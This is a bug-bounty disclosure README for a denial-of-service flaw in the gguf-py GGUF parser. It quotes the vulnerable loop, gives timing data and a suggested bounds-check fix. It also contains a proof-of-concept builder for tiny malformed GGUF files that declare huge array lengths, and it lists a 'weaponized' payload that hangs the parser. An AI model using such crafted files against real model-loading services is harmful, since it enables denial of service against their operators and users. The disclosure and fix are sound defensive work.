GGUF MFV: Unbounded array-length DoS in gguf-py Python parser

huntr Model Format Vulnerability submission. Tier-1 MFV ($4,000).

This repository holds the proof-of-concept GGUF payloads and reproducer script for an unbounded array-length DoS in the canonical Python GGUF parser (gguf-py, shipped as PyPI gguf, maintained at ggml-org/llama.cpp).

Bug class

CWE-400 (Uncontrolled Resource Consumption) / CWE-789 (Memory Allocation with Excessive Size Value).

gguf-py/gguf/gguf_reader.py:239-255 reads a UINT64 alen from the GGUF file header and uses it directly as the loop bound when parsing array-typed metadata fields. There is no upper cap and no file-size consistency check. The C++ sibling parser in the same repository (ggml/src/gguf.cpp:270) does enforce GGUF_MAX_ARRAY_ELEMENTS (1024 * 1024 * 1024 elements), but that protection was not propagated to the Python parser.

Payloads in this repo

| File | Size | Declared alen | Observed parse time (Python 3.13) |
|---|---|---|---|
| array_len_10000.gguf | 56 bytes | 10,000 | 0.05s |
| array_len_100000.gguf | 56 bytes | 100,000 | 0.42s |
| array_len_1000000.gguf | 56 bytes | 1,000,000 | 9.15s |
| malicious_array_len.gguf | 56 bytes | weaponized value | parser hangs effectively forever |
| kv_count_10000.gguf | 47 bytes | 10,000 (kv_count branch) | sibling primitive |
| kv_count_100000.gguf | 47 bytes | 100,000 (kv_count branch) | sibling primitive |
| kv_count_1000000.gguf | 47 bytes | 1,000,000 (kv_count branch) | sibling primitive |

Scaling is roughly linear at ~10 us per iteration (9.15 us at the 1,000,000-element data point). Extrapolation:

| alen | Parse time |
|---|---|
| 10^7 | ~91 s |
| 10^8 | ~15 min |
| 10^9 (matches the C++ sibling cap) | ~2.5 hours |
| 10^12 | ~110 days |
| 2^64 - 1 (UINT64 max) | ~5.8 million years |
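
The extrapolation is plain multiplication, and a short sketch makes it easy to redo with a different rate. The per-iteration cost below is taken from the 1,000,000-element measurement (9.15 s); the function name `projected_seconds` is illustrative and not part of the reproducer.

```python
# Assumption: cost per loop iteration stays constant at the rate measured
# for the 1,000,000-element payload (9.15 s / 1e6 iterations).
SECONDS_PER_ITER = 9.15 / 1_000_000


def projected_seconds(alen: int, rate: float = SECONDS_PER_ITER) -> float:
    """Projected parse time in seconds for a declared array length."""
    return alen * rate


if __name__ == "__main__":
    for alen in (10**7, 10**8, 10**9, 10**12, 2**64 - 1):
        secs = projected_seconds(alen)
        print(f"alen={alen:.3e}  {secs:.3e} s  = {secs / 3600:.3e} h  = {secs / 86400:.3e} days")
```

Passing `rate=10e-6` instead gives the rounded ~10 us figure; the two rates differ by about 9%, which only matters for the largest rows.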

Reproducer

pip install gguf
python poc_gguf_py_array_length_dos.py

The script builds minimal 56-byte GGUF files with varying declared alen, then times the parse via gguf.GGUFReader(path). Linear scaling confirms the unbounded loop. Replay with kv_count_*.gguf against the _build_fields / _build_tensor_info loops at line 165 for the sibling primitive.
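
For readers without the script at hand, the following is a minimal sketch of how such a 56-byte payload could be laid out. It is not the repository's reproducer: the key name `test.arr`, the GGUF version 3, and the UINT8 item type are assumptions chosen so the sizes add up (24-byte header plus a 32-byte key-value entry). The value-type codes follow the GGUF specification (UINT8 = 0, ARRAY = 9).

```python
import struct

GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3          # assumption: the PoC's actual version is not stated
GGUF_TYPE_UINT8 = 0       # GGUFValueType.UINT8
GGUF_TYPE_ARRAY = 9       # GGUFValueType.ARRAY


def build_array_len_payload(declared_len: int, key: bytes = b"test.arr") -> bytes:
    """Build a GGUF blob with one array-typed KV entry that declares
    `declared_len` elements but carries no element data at all."""
    # Header: magic, version, tensor_count = 0, kv_count = 1 (little-endian).
    header = struct.pack("<4sIQQ", GGUF_MAGIC, GGUF_VERSION, 0, 1)
    kv = struct.pack("<Q", len(key)) + key      # key: uint64 length + bytes
    kv += struct.pack("<I", GGUF_TYPE_ARRAY)    # value type: ARRAY
    kv += struct.pack("<I", GGUF_TYPE_UINT8)    # array item type (hypothetical choice)
    kv += struct.pack("<Q", declared_len)       # attacker-controlled alen
    return header + kv


if __name__ == "__main__":
    blob = build_array_len_payload(10_000)
    print(len(blob), "bytes")
```

Writing the blob to disk and timing `gguf.GGUFReader(path)` on it, starting with a small `declared_len`, would follow the measurement procedure described above.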

Sink (verbatim)

llama.cpp/gguf-py/gguf/gguf_reader.py:239-255:

if gtype == GGUFValueType.ARRAY:
    raw_itype = self._get(offs, np.uint32)
    offs += int(raw_itype.nbytes)
    alen = self._get(offs, np.uint64)               # attacker-controlled length
    offs += int(alen.nbytes)
    aparts: list[npt.NDArray[Any]] = [raw_itype, alen]
    data_idxs: list[int] = []
    for idx in range(alen[0]):                       # unbounded iteration
        curr_size, curr_parts, curr_idxs, curr_types = self._get_field_parts(offs, raw_itype[0])
        if idx == 0:
            types += curr_types
        idxs_offs = len(aparts)
        aparts += curr_parts                         # list growth per iter
        data_idxs += (idx + idxs_offs for idx in curr_idxs)
        offs += curr_size
    return offs - orig_offs, aparts, data_idxs, types

Suggested fix

Mirror the C++ cap:

GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024   # 2**30 elements, same value as the C++ cap
GGUF_MAX_STRING_LENGTH  = 1024 * 1024 * 1024   # 2**30 bytes, for string-length reads

# Check immediately after alen is read, before the loop starts.
if int(alen[0]) > GGUF_MAX_ARRAY_ELEMENTS:
    raise ValueError(f"GGUF array length {alen[0]} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")

The same protections are needed for the tensor_count and kv_count reads at line 165.
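
A cap alone still permits up to 2^30 iterations on a tiny file, so a file-size consistency check is a natural complement. The sketch below is one possible shape for a shared guard, not the upstream patch: the helper name `validate_count` and its parameters are hypothetical, and `min_item_size` is assumed to be the smallest on-disk size of one element (for example 1 for UINT8, 8 for a string's length prefix).

```python
GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024  # same value as the cap above


def validate_count(declared: int, min_item_size: int, bytes_remaining: int,
                   what: str = "array length") -> int:
    """Return `declared` as an int, or raise ValueError if it exceeds the cap
    or cannot possibly fit in the bytes left in the file."""
    declared = int(declared)  # also accepts numpy integer scalars
    if declared > GGUF_MAX_ARRAY_ELEMENTS:
        raise ValueError(
            f"GGUF {what} {declared} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")
    if declared * min_item_size > bytes_remaining:
        raise ValueError(
            f"GGUF {what} {declared} needs at least {declared * min_item_size} "
            f"bytes but only {bytes_remaining} remain in the file")
    return declared


if __name__ == "__main__":
    print(validate_count(4, min_item_size=1, bytes_remaining=8))
    try:
        validate_count(1_000_000, min_item_size=1, bytes_remaining=0)
    except ValueError as exc:
        print("rejected:", exc)
```

In the reader, a guard like this could be applied to alen before the loop, and to tensor_count and kv_count with a suitable minimum entry size, with `bytes_remaining` computed from the mapped file length minus the current offset.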

Disclosure status

Submitted to huntr as a Tier-1 Model Format Vulnerability against the GGUF format. This finding belongs to the same primitive class as this researcher's 6 prior MFV memory-amplification findings on npy / npz / messagepack / pickle / parquet / onnx (May 2026).

The maintainers of ggml-org/llama.cpp are being notified through the huntr disclosure flow.
